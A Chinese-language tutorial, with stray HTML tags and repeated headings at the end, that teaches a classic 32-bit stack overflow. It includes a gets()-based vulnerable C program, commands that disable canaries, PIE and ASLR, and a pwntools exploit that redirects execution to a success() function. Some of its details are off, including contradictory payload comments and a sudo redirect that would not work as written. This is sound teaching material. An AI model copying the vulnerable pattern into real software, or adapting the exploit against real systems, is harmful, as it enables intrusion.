栈溢出原理与实例利用教学文档<\/h1>

1. 栈溢出基础概念<\/h2>
栈溢出是指程序向栈中的某个变量写入超过其分配内存空间的数据，导致数据覆盖了相邻的内存区域。这种漏洞可以被利用来修改返回地址、控制程序执行流程。<\/p>

2. 环境准备<\/h2>

2.1 示例程序<\/h3>

#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> success<\/span>() {
<\/span><\/span>    puts("You Hava already controlled it."<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> vulnerable<\/span>() {
<\/span><\/span>    char<\/span> s[12<\/span>];
<\/span><\/span>    gets(s);
<\/span><\/span>    puts(s);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    vulnerable();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 编译选项<\/h3>
gcc -m32 -fno-stack-protector -no-pie stack_example.c -o stack_example
<\/span><\/span><\/code><\/pre>
-m32<\/code>: 生成32位程序<\/li>
-fno-stack-protector<\/code>: 关闭堆栈溢出保护(不生成canary)<\/li>
-no-pie<\/code>: 关闭位置无关可执行文件(PIE)，避免加载基址随机化<\/li>
<\/ul>
2.3 关闭ASLR<\/h3>
sudo echo 0<\/span> > \/proc\/sys\/kernel\/randomize_va_space
<\/span><\/span><\/code><\/pre>ASLR级别说明：<\/p>

0: 关闭ASLR，没有随机化<\/li>
1: 普通ASLR，栈基地址、mmap基地址、.so加载基地址随机化<\/li>
2: 增强ASLR，在1的基础上增加堆基地址随机化<\/li>
<\/ul>
3. 栈帧结构与调用约定<\/h2>
3.1 关键指令<\/h3>


CALL<\/code>指令相当于：<\/p>

PUSH<\/code>下一条指令地址(返回地址)<\/li>
JMP<\/code>到目标函数<\/li>
<\/ul>
<\/li>

RET<\/code>指令相当于：<\/p>

POP EIP<\/code> (ESP+4)<\/li>
<\/ul>
<\/li>

LEAVE<\/code>指令(32位)相当于：<\/p>

MOV ESP,EBP<\/code><\/li>
POP EBP<\/code> (ESP+4)<\/li>
<\/ul>
<\/li>
<\/ul>
3.2 函数调用栈帧变化<\/h3>

调用者保存返回地址<\/li>
被调用函数保存调用者的EBP<\/li>
分配局部变量空间<\/li>
函数执行<\/li>
恢复栈帧(LEAVE)<\/li>
返回(RET)<\/li>
<\/ol>
4. GDB调试分析<\/h2>
4.1 基本调试命令<\/h3>
gdb stack_example
<\/span><\/span>b main      # 主函数下断点<\/span>
<\/span><\/span>r           # 运行程序<\/span>
<\/span><\/span><\/code><\/pre>4.2 反汇编查看<\/h3>
disassemble \/m          # 带源码查看<\/span>
<\/span><\/span>disassemble \/r 0x08048496,0x0804849e  # 查看指定范围并显示机器码<\/span>
<\/span><\/span><\/code><\/pre>4.3 栈帧变化分析<\/h3>
以vulnerable()<\/code>函数为例：<\/p>

push ebp<\/code> - 保存调用者的EBP<\/li>
mov ebp,esp<\/code> - 设置新的栈帧基址<\/li>
sub esp,0x18<\/code> - 分配局部变量空间<\/li>
lea eax,[ebp-0x14]<\/code> - 获取局部变量s的地址<\/li>
push eax<\/code> - 准备gets()参数<\/li>
call gets@plt<\/code> - 调用gets()<\/li>
栈恢复过程：

add esp,0x10<\/code> - 清理参数<\/li>
leave<\/code> - 恢复栈帧<\/li>
ret<\/code> - 返回调用者<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞利用原理<\/h2>
gets()<\/code>函数不检查输入长度，可以覆盖：<\/p>

相邻局部变量<\/li>
保存的EBP<\/li>
返回地址<\/li>
<\/ol>
通过精心构造输入数据，覆盖返回地址为success()<\/code>函数地址(0x0804843b)，即可控制程序流程。<\/p>
6. 利用脚本编写<\/h2>
使用pwntools编写利用脚本：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span># 构造与程序交互的对象<\/span>
<\/span><\/span>sh =<\/span> process('.\/stack_example'<\/span>)
<\/span><\/span>success_addr =<\/span> 0x0804843b<\/span>
<\/span><\/span>
<\/span><\/span># 构造payload<\/span>
<\/span><\/span># 'a'*0x14 覆盖缓冲区(12)和EBP(4)<\/span>
<\/span><\/span># 'bbbb' 覆盖保存的EBP<\/span>
<\/span><\/span># p32(success_addr) 覆盖返回地址<\/span>
<\/span><\/span>payload =<\/span> 'a'<\/span> *<\/span> 0x14<\/span> +<\/span> 'bbbb'<\/span> +<\/span> p32(success_addr)
<\/span><\/span>
<\/span><\/span># 发送payload<\/span>
<\/span><\/span>sh.<\/span>sendline(payload)
<\/span><\/span>
<\/span><\/span># 交互模式<\/span>
<\/span><\/span>sh.<\/span>interactive()
<\/span><\/span><\/code><\/pre>7. 关键点总结<\/h2>

必须关闭栈保护(-fno-stack-protector<\/code>)<\/li>
关闭PIE(-no-pie<\/code>)使函数地址固定<\/li>
关闭ASLR使栈地址可预测<\/li>
准确计算偏移量(缓冲区大小+EBP大小)<\/li>
小端序存储地址数据<\/li>
gets()等危险函数是常见漏洞点<\/li>
<\/ol>
8. 扩展学习<\/h2>

不同保护机制下的绕过方法<\/li>
ROP(Return-Oriented Programming)技术<\/li>
现代漏洞缓解技术(ASLR, DEP, CFG等)<\/li>
其他危险函数(strcpy, sprintf等)的利用<\/li>
<\/ol>
通过本教程，您应该掌握了基本的栈溢出原理、调试方法和利用技术。下一步可以尝试更复杂的漏洞利用场景。<\/p>

栈溢出原理与实例利用教学文档<\/h1>

1. 栈溢出基础概念<\/h2> 栈溢出是指程序向栈中的某个变量写入超过其分配内存空间的数据，导致数据覆盖了相邻的内存区域。这种漏洞可以被利用来修改返回地址、控制程序执行流程。<\/p>

2. 环境准备<\/h2>

3. 栈帧结构与调用约定<\/h2>

4. GDB调试分析<\/h2>

1. 栈溢出基础概念<\/h2>
栈溢出是指程序向栈中的某个变量写入超过其分配内存空间的数据，导致数据覆盖了相邻的内存区域。这种漏洞可以被利用来修改返回地址、控制程序执行流程。<\/p>